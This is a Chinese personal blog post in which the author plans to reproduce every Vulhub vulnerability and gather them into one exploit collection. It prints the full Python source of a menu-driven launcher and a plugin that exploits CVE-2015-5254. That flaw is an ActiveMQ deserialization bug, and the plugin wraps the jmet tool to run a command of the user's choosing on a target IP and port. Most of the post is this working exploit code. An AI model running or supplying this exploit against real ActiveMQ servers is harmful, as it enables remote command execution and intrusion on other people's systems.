Vulnerability project

  1. 前言
  2. 正文

前言

今天下午有个想法,嗯。暂时不得而知是什么想法,也就是写漏洞利用的项目吧。距离过年还有半个月左右,感觉越大过年没什么滋味了,小时候的朋友全部都分道扬镳。都是常规操作:

拜年——>收钱
别人过来你这<—–送钱
剩余时间:待在房间干自己的事情

6c3a000368ec88077cc8

正文

https://vulhub.org/
我打算把这里的漏洞全部复现一遍,然后写个漏洞利用集合体

kSrhZD.png

刚刚复现完的第一个:

CVE-2015-5254

这里就不重复了,直接看代码吧:

目录结构

├─arms
│  └─jmet-master
│      ├─external
│      ├─scripts
│      └─src
│          ├─assembly
│          └─main
│              ├─java
│              │  └─de
│              │      └─codewhite
│              │          └─jmet
│              │              ├─exceptions
│              │              ├─filter
│              │              ├─messagetexts
│              │              ├─payload
│              │              │  └─impl
│              │              ├─target
│              │              │  └─impl
│              │              ├─types
│              │              └─wrapper
│              └─resources
├─doc
└─plugin

主要的脚本:
haq520.py

#author:九世
#time:2019/1/16

try:
    import readline
except:
    pass

import time

class Main:
    def cve_2015_5254(self):
        obj=__import__('plugin.CVE-2015-5254',fromlist=True) #导入了plugin文件里的CVE-2015-2524
        daoru=getattr(obj,'jiancha') #调用了jiancha()函数,此时:daoru=jiancha()
        daoru()
        time.sleep(1)
        daoru2=getattr(obj,'run')
        ips=input('IP:')
        ports=input('port:')
        execs=input('exec:')
        daoru2(execs,ips,ports)

if __name__ == '__main__':
    obj=Main()
    exp_list=['[1] CVE-2015-5254']
    exp_cat={'1':obj.cve_2015_5254}
    while True:
        print('[h] exploit select:)')
        for e in exp_list:
            print(e)
            print('')
            print('')

        user=input('select:>')
        if user in exp_cat:
            exp_cat.get(user)()
            print('')
            print('')
        elif user=='exit':
            break
        else:
            print('[e] Not Found select')
            print('')
            print('')
            continue

plugin插件里面的CVE-2015-5254

#author:九世
#time:2019/1/16

import os
import re

def jiancha():
    if os.path.exists('arms/jmet-master'):
        print('[h] Found arms/jmet-master')
    else:
        print('[q] Not Found arms/jmet-marser....')
        exit()

def run(execq,ip,port):
    execs='java -jar arms/jmet-master/jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "{}" -Yp ROME {} {}'.format(execq,ip,port)
    zx=os.popen(execs)
    zhenze=re.findall('ID:.*',str(zx.read()))
    if len(zhenze)>0:
        print('[a] Found CVE-2015-5254')
        for i in zhenze:
            print(i)
    else:
        print('[q] Not Found CVE-2015-5254')

测试效果:

kSrvdg.png

kSrxoQ.png

这世界上所有的劣势都是由当事人的能力不足所造成的

转载请声明:转自422926799.github.io


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:Vulnerability project

本文作者:九世

发布时间:2019-01-16, 17:34:10

最后更新:2019-04-19, 20:36:16

原始链接:http://422926799.github.io/posts/b780d8aa.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录